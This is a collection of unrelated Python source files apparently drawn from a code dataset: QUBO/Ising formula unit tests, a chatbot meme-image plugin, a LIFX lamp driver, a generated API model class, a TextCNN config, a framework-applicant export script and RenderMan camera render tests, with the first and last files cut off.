class TestPyDenseGraphFormulas(TestDenseGraphFormulasBase, unittest.TestCase) :
def __init__(self, testFunc) :
TestDenseGraphFormulasBase.__init__(self, sq.py, np.float64)
unittest.TestCase.__init__(self, testFunc)
# Tests for native formula modules
class TestNativeDenseGraphFormulasBase(TestDenseGraphFormulasBase, unittest.TestCase) :
def __init__(self, testFunc) :
TestDenseGraphFormulasBase.__init__(self, sq.py, np.float64)
unittest.TestCase.__init__(self, testFunc)
def test_compare_engery(self):
N = 8
W = self.new_W(N)
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Ebatched = sq.py.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
E = np.empty((2 ** N))
for i in range(0, 2 ** N) :
E[i] = self.pkg.formulas.dense_graph_calculate_E(W, xlist[i], self.dtype)
self.assertTrue(np.allclose(Ebatched, E))
def test_compare_engery_batched(self):
N = 8
W = self.new_W(N)
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Ebatched = sq.py.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
E = self.pkg.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
self.assertTrue(np.allclose(Ebatched, E))
def test_compare_hamiltonian(self):
N = 8
W = common.generate_random_symmetric_W((N), dtype=np.float64)
h0, J0, c0 = sq.py.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
h1, J1, c1 = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
# identity
self.assertTrue(np.allclose(0., - np.sum(h1) + np.sum(J1) + c1, atol=self.epu))
self.assertTrue(np.allclose(h0, h1))
self.assertTrue(np.allclose(J0, J1))
self.assertTrue(np.allclose(c0, c1))
def test_compare_hamiltonian_energy(self):
N = 8
W = common.generate_random_symmetric_W((N), dtype=np.float64)
h0, J0, c0 = sq.py.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
h1, J1, c1 = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
# identity
self.assertTrue(np.allclose(0., - np.sum(h1) + np.sum(J1) + c1, atol=self.epu))
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Equbo = sq.py.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
Eising = np.empty((2 ** N))
for idx in range(0, 2 ** N) :
x = xlist[idx]
q = 2 * x - 1
Eising[idx] = self.pkg.formulas.dense_graph_calculate_E_from_spin(h1, J1, c1, q, self.dtype)
self.assertTrue(np.allclose(Equbo, Eising, atol=self.epu))
def test_compare_hamiltonian_energy_batched(self):
N = 8
W = common.generate_random_symmetric_W((N), dtype=np.float64)
h0, J0, c0 = sq.py.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
h1, J1, c1 = self.pkg.formulas.dense_graph_calculate_hamiltonian(W, self.dtype)
# identity
self.assertTrue(np.allclose(0., - np.sum(h1) + np.sum(J1) + c1, atol=self.epu))
xlist = common.create_bitset_sequence(range(0, 2 ** N), N)
Equbo = sq.py.formulas.dense_graph_batch_calculate_E(W, xlist, self.dtype)
Eising = np.empty((2 ** N))
qlist = 2 * xlist - 1
Eising = self.pkg.formulas.dense_graph_batch_calculate_E_from_spin(h1, J1, c1, qlist, self.dtype)
self.assertTrue(np.allclose(Equbo, Eising, atol=self.epu))
class TestCPUDenseGraphFormulasFP32(TestDenseGraphFormulasBase, unittest.TestCase) :
def __init__(self, testFunc) :
TestDenseGraphFormulasBase.__init__(self, sq.cpu, np.float32)
unittest.TestCase.__init__(self, testFunc)
class TestCPUDenseGraphFormulasFP64(TestDenseGraphFormulasBase, unittest.TestCase) :
def __init__(self, testFunc) :
TestDenseGraphFormulasBase.__init__(self, sq.cpu, np.float64)
unittest.TestCase.__init__(self, testFunc)
if sq.is_cuda_available() :
class TestCUDADenseGraphFormulasFP32(TestDenseGraphFormulasBase, unittest.TestCase) :
def __init__(self, testFunc) :
TestDenseGraphFormulasBase.__init__(self, sq.cuda, np.float32)
unittest.TestCase.__init__(self, testFunc)
class TestCUDADenseGraphFormulasFP64(TestDenseGraphFormulasBase, unittest.TestCase) :
def __init__(self, testFunc) :
TestDenseGraphFormulasBase.__init__(self, sq.cuda, np.float64)
unittest.TestCase.__init__(self, testFunc)
if __name__ == '__main__':
np.random.seed(0)
unittest.main()
| StarcoderdataPython |
1658608 | from pandas import DataFrame, Series
def set_value_where(data, columns, value, where):
"""
:type data: DataFrame
:type columns: str
:type where: Series
:rtype: DataFrame
"""
data.set_value(index=data[where].index, col=columns, value=value)
return data
| StarcoderdataPython |
3263970 | import os
import asyncio
from PIL import Image
from concurrent.futures import ThreadPoolExecutor
from hoshino import Service, priv
from hoshino.typing import HoshinoBot, CQEvent, MessageSegment, CommandSession
from hoshino.util import FreqLimiter, DailyNumberLimiter, pic2b64
from .src.generator import genImage
from .src.image import high_eq_path, draw_text, get_jl, concat_head_, concat_head_real_, make_hide_image, make_hide_image_color
from .src.utils import save_img, get_all_img_url
from hoshino.modules.image_generator.src.utils import get_image
_max = 10
_time = 60
EXCEED_NOTICE = f'您今天已经使用{_max}次了,休息一下明天再来吧~'
_nlmt = DailyNumberLimiter(_max)
_flmt = FreqLimiter(_time)
HELP_MSG = '''
[5000兆元|5000兆円|5kcy] (上半句) (下半句)
低情商 <文本> 高情商 <文本>
金龙盘旋 <文字1> <文字2> <底部文字>
金龙飞升 <文字1> <文字2> <底部文字>
金龙酷炫 <文字> <底部文字>
接头 <图片>
real接头 <图片>
@bot 隐藏图片
'''.strip()
sv = Service('生草图片生成器', help_=HELP_MSG)
@sv.on_prefix(('5000兆元', '5000兆円', '5kcy'))
async def gen_5000_pic(bot: HoshinoBot, ev: CQEvent):
uid = ev.user_id
gid = ev.group_id
if not _nlmt.check(uid):
await bot.finish(ev, EXCEED_NOTICE, at_sender=True)
if not _flmt.check(uid):
await bot.finish(ev, f'您冲的太快了,{round(_flmt.left_time(uid))}秒后再来吧', at_sender=True)
try:
keyword = ev.message.extract_plain_text().strip()
args = ev.message.extract_plain_text().strip().split()
if len(args) != 2:
await bot.finish(ev, f"5000兆元需要两个参数")
upper = args[0]
downer = args[1]
img = genImage(word_a=upper, word_b=downer)
img = str(MessageSegment.image(pic2b64(img)))
await bot.send(ev, img, at_sender=True)
_nlmt.increase(uid)
except OSError:
await bot.send(ev, '生成失败……请检查字体文件设置是否正确')
except:
await bot.send(ev, '生成失败……请检查命令格式是否正确')
@sv.on_rex('低情商(?P<left>.+)高情商(?P<right>.+)')
async def gen_high_eq(bot: HoshinoBot, ev: CQEvent):
uid = ev['user_id']
gid = ev['group_id']
left = ev['match'].group('left').strip()
right = ev['match'].group('right').strip()
if not _nlmt.check(uid):
await bot.finish(ev, EXCEED_NOTICE, at_sender=True)
if not _flmt.check(uid):
await bot.finish(ev, f'您冲的太快了,{round(_flmt.left_time(uid))}秒后再来吧', at_sender=True)
if len(left) > 15 or len(right) > 15:
await bot.finish(ev, '为了图片质量,请不要多于15个字符')
img_p = Image.open(high_eq_path)
draw_text(img_p, left, 0)
draw_text(img_p, right, 400)
img = str(MessageSegment.image(pic2b64(img_p)))
if not priv.check_priv(ev, priv.SUPERUSER):
_flmt.start_cd(uid)
_nlmt.increase(uid)
await bot.send(ev, img, at_sender=True)
@sv.on_prefix('金龙')
async def gen_jl(bot: HoshinoBot, ev: CQEvent):
uid = ev['user_id']
gid = ev['group_id']
args = ev.message.extract_plain_text().strip().split()
if not _nlmt.check(uid):
await bot.finish(ev, EXCEED_NOTICE, at_sender=True)
if not _flmt.check(uid):
await bot.finish(ev, f'您冲的太快了,{round(_flmt.left_time(uid))}秒后再来吧', at_sender=True)
if args[0] == '盘旋':
if len(args) != 4:
await bot.finish(ev, f"金龙{args[0]}需要三个参数")
else: url = await get_jl(args[0], args[1], args[2], args[3])
elif args[0] == '飞升':
if len(args) != 4:
await bot.finish(ev, f"金龙{args[0]}需要三个参数")
else: url = await get_jl(args[0], args[1], args[2], args[3])
elif args[0] == '酷炫':
if len(args) != 3:
await bot.finish(ev, f"金龙{args[0]}需要两个参数")
else: url = await get_jl(args[0], args[1], None, args[2])
else: return
try:
img = str(MessageSegment.image(url))
if not priv.check_priv(ev, priv.SUPERUSER):
_flmt.start_cd(uid)
_nlmt.increase(uid)
await bot.send(ev, img, at_sender=True)
except:
bot.send(ev, '无法生成图片')
@sv.on_keyword(('接头霸王', '接头'))
async def concat_head(bot: HoshinoBot, ev: CQEvent):
uid = ev['user_id']
gid = ev['group_id']
msg = ev.message.extract_plain_text().strip()
if not _nlmt.check(uid):
await bot.finish(ev, EXCEED_NOTICE, at_sender=True)
if not _flmt.check(uid):
await bot.finish(ev, f'您冲的太快了,{round(_flmt.left_time(uid))}秒后再来吧', at_sender=True)
if (img := await get_image(bot, ev)) is not None:
if '三次元' in msg or 'real' in msg:
catimg = await concat_head_real_(img)
else:
catimg = await concat_head_(img)
if catimg is not None:
catimg = str(MessageSegment.image(pic2b64(catimg)))
await bot.send(ev, catimg, at_sender=True)
else:
fail_pic = Image.open(os.path.join(os.path.dirname(__file__), 'images/head/接头失败.png'))
await bot.send(ev, '三次元图片试试三次元接头?' + MessageSegment.image(f'file://{fail_pic}'), at_sender=True)
else:
await bot.send(ev, '未检测到图片信息', at_sender=True)
img = {}
send_times = {}
color_flag = {}
@sv.on_command('hide_image', only_to_me=True, aliases=['隐藏图片'])
async def hide_image(session: CommandSession):
global img
global send_times
await session.aget('', prompt='发送要上传的图片,暂不支持gif')
event = session.ctx
uid = event['user_id']
msg = event.message.extract_plain_text().strip()
if uid not in img:
img[uid] = []
if uid not in send_times:
send_times[uid] = 0
if uid not in color_flag:
color_flag[uid] = False
if '彩' in msg:
color_flag[uid] = True
await session.send('切换为彩图模式')
image = await save_img(get_all_img_url(event))
if image:
img[uid].extend(image)
else:
send_times[uid] += 1
if send_times[uid] >= 3:
await session.finish('过多次未发送图片,已自动停止')
img[uid] = []
send_times[uid] = 0
if len(img[uid]) == 0:
session.pause('请上传第一张图片')
elif len(img[uid]) == 1:
session.pause('请上传第二张图片')
elif len(img[uid]) >= 2:
await session.send('正在合成图片,请稍后')
loop = asyncio.get_event_loop()
executor = ThreadPoolExecutor()
if color_flag[uid]:
res_img = await loop.run_in_executor(executor, make_hide_image_color, img[uid][0], img[uid][1])
else:
res_img = await loop.run_in_executor(executor, make_hide_image, img[uid][0], img[uid][1])
msg = str(MessageSegment.image(pic2b64(res_img)))
img[uid] = []
send_times[uid] = 0
color_flag[uid] = False
await session.finish(msg)
| StarcoderdataPython |
3261317 | <filename>benchmarks/digis/lamp/driver/lifx.py
from digi import logger
from lifxlan import LifxLAN
def put(dev, power, color):
# TBD: in a single call
dev.set_power(power)
dev.set_color(color)
def get(dev, retry=3):
for _ in range(retry):
try:
status = {
"power": dev.get_power(),
"color": dev.get_color(),
}
return status
except Exception as e:
logger.info(f"lifx: unable to get status due to {e}")
continue
return None
def discover(_id):
try:
devices = LifxLAN().get_lights()
device_by_mac = {d.get_mac_addr(): d for d in devices}
logger.info(f"lifx: found {len(devices)} light(s): "
f"{device_by_mac}\n")
return device_by_mac[_id]
except Exception as e:
logger.info(f"lifx: unable to find device due to {e}")
return None
if __name__ == '__main__':
discover(_id=None)
| StarcoderdataPython |
4814561 | # coding: utf-8
"""
NamSor API v2
NamSor API v2 : enpoints to process personal names (gender, cultural origin or ethnicity) in all alphabets or languages. Use GET methods for small tests, but prefer POST methods for higher throughput (batch processing of up to 100 names at a time). Need something you can't find here? We have many more features coming soon. Let us know, we'll do our best to add it! # noqa: E501
OpenAPI spec version: 2.0.10
Contact: <EMAIL>
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class APIBillingPeriodUsageOut(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'api_key': 'str',
'subscription_started': 'int',
'period_started': 'int',
'period_ended': 'int',
'stripe_current_period_end': 'int',
'stripe_current_period_start': 'int',
'billing_status': 'str',
'usage': 'int',
'soft_limit': 'int',
'hard_limit': 'int'
}
attribute_map = {
'api_key': 'apiKey',
'subscription_started': 'subscriptionStarted',
'period_started': 'periodStarted',
'period_ended': 'periodEnded',
'stripe_current_period_end': 'stripeCurrentPeriodEnd',
'stripe_current_period_start': 'stripeCurrentPeriodStart',
'billing_status': 'billingStatus',
'usage': 'usage',
'soft_limit': 'softLimit',
'hard_limit': 'hardLimit'
}
def __init__(self, api_key=None, subscription_started=None, period_started=None, period_ended=None, stripe_current_period_end=None, stripe_current_period_start=None, billing_status=None, usage=None, soft_limit=None, hard_limit=None): # noqa: E501
"""APIBillingPeriodUsageOut - a model defined in OpenAPI""" # noqa: E501
self._api_key = None
self._subscription_started = None
self._period_started = None
self._period_ended = None
self._stripe_current_period_end = None
self._stripe_current_period_start = None
self._billing_status = None
self._usage = None
self._soft_limit = None
self._hard_limit = None
self.discriminator = None
if api_key is not None:
self.api_key = api_key
if subscription_started is not None:
self.subscription_started = subscription_started
if period_started is not None:
self.period_started = period_started
if period_ended is not None:
self.period_ended = period_ended
if stripe_current_period_end is not None:
self.stripe_current_period_end = stripe_current_period_end
if stripe_current_period_start is not None:
self.stripe_current_period_start = stripe_current_period_start
if billing_status is not None:
self.billing_status = billing_status
if usage is not None:
self.usage = usage
if soft_limit is not None:
self.soft_limit = soft_limit
if hard_limit is not None:
self.hard_limit = hard_limit
@property
def api_key(self):
"""Gets the api_key of this APIBillingPeriodUsageOut. # noqa: E501
:return: The api_key of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: str
"""
return self._api_key
@api_key.setter
def api_key(self, api_key):
"""Sets the api_key of this APIBillingPeriodUsageOut.
:param api_key: The api_key of this APIBillingPeriodUsageOut. # noqa: E501
:type: str
"""
self._api_key = api_key
@property
def subscription_started(self):
"""Gets the subscription_started of this APIBillingPeriodUsageOut. # noqa: E501
:return: The subscription_started of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: int
"""
return self._subscription_started
@subscription_started.setter
def subscription_started(self, subscription_started):
"""Sets the subscription_started of this APIBillingPeriodUsageOut.
:param subscription_started: The subscription_started of this APIBillingPeriodUsageOut. # noqa: E501
:type: int
"""
self._subscription_started = subscription_started
@property
def period_started(self):
"""Gets the period_started of this APIBillingPeriodUsageOut. # noqa: E501
:return: The period_started of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: int
"""
return self._period_started
@period_started.setter
def period_started(self, period_started):
"""Sets the period_started of this APIBillingPeriodUsageOut.
:param period_started: The period_started of this APIBillingPeriodUsageOut. # noqa: E501
:type: int
"""
self._period_started = period_started
@property
def period_ended(self):
"""Gets the period_ended of this APIBillingPeriodUsageOut. # noqa: E501
:return: The period_ended of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: int
"""
return self._period_ended
@period_ended.setter
def period_ended(self, period_ended):
"""Sets the period_ended of this APIBillingPeriodUsageOut.
:param period_ended: The period_ended of this APIBillingPeriodUsageOut. # noqa: E501
:type: int
"""
self._period_ended = period_ended
@property
def stripe_current_period_end(self):
"""Gets the stripe_current_period_end of this APIBillingPeriodUsageOut. # noqa: E501
:return: The stripe_current_period_end of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: int
"""
return self._stripe_current_period_end
@stripe_current_period_end.setter
def stripe_current_period_end(self, stripe_current_period_end):
"""Sets the stripe_current_period_end of this APIBillingPeriodUsageOut.
:param stripe_current_period_end: The stripe_current_period_end of this APIBillingPeriodUsageOut. # noqa: E501
:type: int
"""
self._stripe_current_period_end = stripe_current_period_end
@property
def stripe_current_period_start(self):
"""Gets the stripe_current_period_start of this APIBillingPeriodUsageOut. # noqa: E501
:return: The stripe_current_period_start of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: int
"""
return self._stripe_current_period_start
@stripe_current_period_start.setter
def stripe_current_period_start(self, stripe_current_period_start):
"""Sets the stripe_current_period_start of this APIBillingPeriodUsageOut.
:param stripe_current_period_start: The stripe_current_period_start of this APIBillingPeriodUsageOut. # noqa: E501
:type: int
"""
self._stripe_current_period_start = stripe_current_period_start
@property
def billing_status(self):
"""Gets the billing_status of this APIBillingPeriodUsageOut. # noqa: E501
:return: The billing_status of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: str
"""
return self._billing_status
@billing_status.setter
def billing_status(self, billing_status):
"""Sets the billing_status of this APIBillingPeriodUsageOut.
:param billing_status: The billing_status of this APIBillingPeriodUsageOut. # noqa: E501
:type: str
"""
self._billing_status = billing_status
@property
def usage(self):
"""Gets the usage of this APIBillingPeriodUsageOut. # noqa: E501
:return: The usage of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: int
"""
return self._usage
@usage.setter
def usage(self, usage):
"""Sets the usage of this APIBillingPeriodUsageOut.
:param usage: The usage of this APIBillingPeriodUsageOut. # noqa: E501
:type: int
"""
self._usage = usage
@property
def soft_limit(self):
"""Gets the soft_limit of this APIBillingPeriodUsageOut. # noqa: E501
:return: The soft_limit of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: int
"""
return self._soft_limit
@soft_limit.setter
def soft_limit(self, soft_limit):
"""Sets the soft_limit of this APIBillingPeriodUsageOut.
:param soft_limit: The soft_limit of this APIBillingPeriodUsageOut. # noqa: E501
:type: int
"""
self._soft_limit = soft_limit
@property
def hard_limit(self):
"""Gets the hard_limit of this APIBillingPeriodUsageOut. # noqa: E501
:return: The hard_limit of this APIBillingPeriodUsageOut. # noqa: E501
:rtype: int
"""
return self._hard_limit
@hard_limit.setter
def hard_limit(self, hard_limit):
"""Sets the hard_limit of this APIBillingPeriodUsageOut.
:param hard_limit: The hard_limit of this APIBillingPeriodUsageOut. # noqa: E501
:type: int
"""
self._hard_limit = hard_limit
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, APIBillingPeriodUsageOut):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| StarcoderdataPython |
3385867 | <filename>TextCNN/config.py
import torch
class Config(object):
"""Base configuration class."""
#训练文件夹位置
train_dir = "data/train"
#评估文件夹位置
eval_dir = "data/eval"
#模型的保存位置
save_path='model/'
#是否使用gpu
cuda = True
#训练的epoch
epochs = 2
batch_size = 64
#学习率
learning_rate = 0.001
#学习率动量
learning_momentum = 0.9
#学习率衰减稀疏
weight_decay = 0.0001
dropout = 0.5
#生成的词嵌入的维度
embed_dim = 128
#卷积核的数量
kernel_num = 100
#卷积核的尺寸
kernel_sizes = "3,4,5"
#训练多少个epoch时,模型保存
save_interval = 2
#初始化,是否使用gpu
def __init__(self):
if self.cuda:
self.cuda = torch.cuda.is_available()
self.device = torch.device("cuda:0" if self.cuda else "cpu")
def dump(self):
"""打印配置信息"""
print("模型配置如下:")
for a in dir(self):
if not a.startswith("__") and not callable(getattr(self, a)):
print("\t{:30} = {}".format(a, getattr(self, a)))
print()
| StarcoderdataPython |
122827 | <filename>scripts/framework-applications/export-framework-applicant-details.py
#!/usr/bin/env python
"""Export supplier "about you" information for suppliers who applied to a framework.
This report includes registered company information and contact details.
Usage:
scripts/framework-applications/export-framework-applicant-details.py <stage> <framework_slug> <output_dir>
Options:
--verbose Show debug log messages
-h, --help Show this screen
Example:
scripts/framework-applications/export-framework-applicant-details.py dev g-cloud-12 SCRIPT_OUTPUTS
"""
import datetime
import errno
from multiprocessing.pool import ThreadPool
import os
import sys
sys.path.insert(0, '.')
from docopt import docopt
from dmscripts.helpers.auth_helpers import get_auth_token
from dmscripts.helpers.logging_helpers import configure_logger, get_logger
from dmscripts.helpers.logging_helpers import INFO as loglevel_INFO, DEBUG as loglevel_DEBUG
from dmscripts.export_framework_applicant_details import export_supplier_details
from dmapiclient import DataAPIClient
from dmutils.env_helpers import get_api_endpoint_from_stage
if __name__ == '__main__':
arguments = docopt(__doc__)
STAGE = arguments['<stage>']
FRAMEWORK = arguments['<framework_slug>']
OUTPUT_DIR = arguments['<output_dir>']
configure_logger({"script": loglevel_DEBUG if arguments["--verbose"] else loglevel_INFO})
logger = get_logger()
client = DataAPIClient(get_api_endpoint_from_stage(STAGE), get_auth_token('api', STAGE))
now = datetime.datetime.now()
filename = FRAMEWORK + "-supplier-about-you-data-" + now.strftime("%Y-%m-%d_%H.%M-") + STAGE + ".csv"
filepath = OUTPUT_DIR + os.sep + filename
# Create output directory if it doesn't already exist
if not os.path.exists(os.path.dirname(filepath)):
try:
os.makedirs(os.path.dirname(filepath))
except OSError as exc: # Guard against race condition
if exc.errno != errno.EEXIST:
raise
framework_lot_slugs = tuple([lot['slug'] for lot in client.get_framework(FRAMEWORK)['frameworks']['lots']])
pool = ThreadPool(3)
export_supplier_details(
client, FRAMEWORK, filepath, framework_lot_slugs=framework_lot_slugs, map_impl=pool.imap, logger=logger
)
| StarcoderdataPython |
4826822 | ##########################################################################
#
# Copyright (c) 2008, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import IECoreRI
import os.path
import os
class CameraTest( IECoreRI.TestCase ) :
def testParameters( self ) :
r = IECoreRI.Renderer( "test/IECoreRI/output/testCamera.rib" )
r.camera( "main", {
"resolution" : IECore.V2iData( IECore.V2i( 1024, 200 ) ),
"screenWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( -1 ), IECore.V2f( 1 ) ) ),
"cropWindow" : IECore.Box2fData( IECore.Box2f( IECore.V2f( 0.1, 0.1 ), IECore.V2f( 0.9, 0.9 ) ) ),
"clippingPlanes" : IECore.V2fData( IECore.V2f( 1, 1000 ) ),
"projection" : IECore.StringData( "perspective" ),
"projection:fov" : IECore.FloatData( 45 ),
"shutter" : IECore.V2fData( IECore.V2f( 0, 0.1 ) ),
} )
r.worldBegin()
r.worldEnd()
l = "".join( file( "test/IECoreRI/output/testCamera.rib" ).readlines() )
l = " ".join( l.split() )
self.assert_( "Format 1024 200 1 " in l )
self.assert_( "ScreenWindow -1 1 -1 1" in l )
self.assert_( "CropWindow 0.1 0.9 0.1 0.9" in l )
self.assert_( ("Clipping 1 1000" in l) or ("Clipping 1 1e3" in l) )
self.assert_( "Projection \"perspective\" \"float fov\" [ 45 ]" in l )
self.assert_( "Shutter 0 0.1" in l )
def testPositioning( self ) :
# render a plane at z = 0 with the default camera
r = IECoreRI.Renderer( "" )
r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
r.worldBegin()
IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.1 ), IECore.V2f( 0.1 ) ) ).render( r )
r.worldEnd()
# check that nothing appears in the output image
i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
e = IECore.PrimitiveEvaluator.create( i )
result = e.createResult()
a = e.A()
e.pointAtUV( IECore.V2f( 0.5, 0.5 ), result )
self.assertEqual( result.floatPrimVar( a ), 0 )
del r
# render a plane at z = 0 with the camera moved back a touch to see it
r = IECoreRI.Renderer( "" )
r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
r.transformBegin()
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, 1 ) ) )
r.camera( "main", {} )
r.transformEnd()
r.worldBegin()
IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.1 ), IECore.V2f( 0.1 ) ) ).render( r )
r.worldEnd()
# check that something appears in the output image
i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
e = IECore.PrimitiveEvaluator.create( i )
result = e.createResult()
a = e.A()
e.pointAtUV( IECore.V2f( 0.5, 0.5 ), result )
self.assertEqual( result.floatPrimVar( a ), 1 )
def testXYOrientation( self ) :
# render a red square at x==1, and a green one at y==1
r = IECoreRI.Renderer( "" )
r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
r.transformBegin()
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, 1 ) ) )
r.camera( "main", { "resolution" : IECore.V2iData( IECore.V2i( 512 ) ) } )
r.transformEnd()
r.worldBegin()
r.setAttribute( "color", IECore.Color3fData( IECore.Color3f( 1, 0, 0 ) ) )
IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( 0.75, -0.25 ), IECore.V2f( 1.25, 0.25 ) ) ).render( r )
r.setAttribute( "color", IECore.Color3fData( IECore.Color3f( 0, 1, 0 ) ) )
IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.25, 0.75 ), IECore.V2f( 0.25, 1.25 ) ) ).render( r )
r.worldEnd()
# check we get the colors we'd expect where we expect them
i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
e = IECore.PrimitiveEvaluator.create( i )
result = e.createResult()
a = e.A()
r = e.R()
g = e.G()
b = e.B()
e.pointAtUV( IECore.V2f( 1, 0.5 ), result )
self.assertEqual( result.floatPrimVar( a ), 1 )
self.assertEqual( result.floatPrimVar( r ), 1 )
self.assertEqual( result.floatPrimVar( g ), 0 )
self.assertEqual( result.floatPrimVar( b ), 0 )
e.pointAtUV( IECore.V2f( 0.5, 0 ), result )
self.assertEqual( result.floatPrimVar( a ), 1 )
self.assertEqual( result.floatPrimVar( r ), 0 )
self.assertEqual( result.floatPrimVar( g ), 1 )
self.assertEqual( result.floatPrimVar( b ), 0 )
def testMultipleCameraRIB( self ) :
r = IECoreRI.Renderer( "test/IECoreRI/output/testCamera.rib" )
with IECore.TransformBlock( r ) :
r.setTransform( IECore.M44f.createTranslated( IECore.V3f( 1, 2, 3 ) ) )
r.camera( "first", {
"projection" : IECore.StringData( "perspective" ),
"projection:fov" : IECore.FloatData( 45 ),
} )
with IECore.TransformBlock( r ) :
r.setTransform( IECore.M44f.createTranslated( IECore.V3f( 3, 4, 5 ) ) )
r.camera( "second", {
"projection" : IECore.StringData( "perspective" ),
"projection:fov" : IECore.FloatData( 50 ),
} )
with IECore.WorldBlock( r ) :
pass
l = "".join( file( "test/IECoreRI/output/testCamera.rib" ).readlines() )
l = " ".join( l.split() )
self.assertTrue( "Projection \"perspective\" \"float fov\" [ 45 ]" in l )
self.assertTrue( "Camera \"first\"" in l )
self.assertTrue( "Projection \"perspective\" \"float fov\" [ 50 ]" in l )
self.assertTrue( "Camera \"second\"" in l )
self.assertEqual( l.count( "Camera" ), 2 )
def testMultipleCameraRender( self ) :
r = IECoreRI.Renderer( "" )
r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
with IECore.TransformBlock( r ) :
r.camera( "iCantSeeAnything", {} )
with IECore.TransformBlock( r ) :
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0, 0, 1 ) ) )
r.camera( "iCanSeeSomething", {} )
with IECore.WorldBlock( r ) :
IECore.MeshPrimitive.createPlane( IECore.Box2f( IECore.V2f( -0.1 ), IECore.V2f( 0.1 ) ) ).render( r )
# check that something appears in the output image
i = IECore.Reader.create( "test/IECoreRI/output/testCamera.tif" ).read()
e = IECore.PrimitiveEvaluator.create( i )
result = e.createResult()
a = e.A()
e.pointAtUV( IECore.V2f( 0.5, 0.5 ), result )
self.assertEqual( result.floatPrimVar( a ), 1 )
def testMotionBlurCameraRender( self ) :
r = IECoreRI.Renderer( "" )
r.display( "test/IECoreRI/output/testCamera.tif", "tiff", "rgba", {} )
with IECore.TransformBlock( r ) :
with IECore.MotionBlock( r, [ 0, 1 ] ) :
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( -0.2, 0, 1 ) ) )
r.concatTransform( IECore.M44f.createTranslated( IECore.V3f( 0.2, 0, 1 ) ) )
r.camera( "main", { "shutter" : IECore.V2f( 0, 1 ) } )
